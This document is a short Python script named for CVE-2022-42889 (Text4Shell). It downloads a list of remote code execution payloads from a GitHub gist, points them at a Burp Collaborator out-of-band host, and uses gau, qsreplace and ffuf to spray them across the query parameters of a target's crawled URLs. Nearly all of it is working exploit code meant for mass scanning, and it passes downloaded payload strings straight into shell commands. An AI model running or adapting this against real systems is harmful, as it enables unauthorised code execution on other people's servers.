CVE-2022-42889.py

#/usr/bin/python3

import os

# Download the payloads.txt
os.system("wget https://gist.githubusercontent.com/kljunowsky/97479082f50cd9219e80258f698c4d26/raw/7e600767bc59483653a34f17bd426340f28bf086/text4shell-payloads.txt -O payloads.txt")

# Read payloads from file
with open("payloads.txt", "r") as f:
    payloads = f.read().splitlines()

# Replace COLLABORATOR-HERE with id.burpcollaborator.com and add %20 for space
payloads = [payload.replace("COLLABORATOR-HERE", "id.burpcollaborator.com").replace(" ", "%20") for payload in payloads]

# Open file to write final payloads
with open("payloads-final.txt", "w") as f:
    for payload in payloads:
        # Execute gau command
        os.system(f"echo TARGET.com | gau --blacklist ttf,woff,svg,png | qsreplace {payload} | grep 'java.lang.Runtime.getRuntime' >> payloads-final.txt")

# Execute ffuf command
os.system("ffuf -w payloads-final.txt -u FUZZ")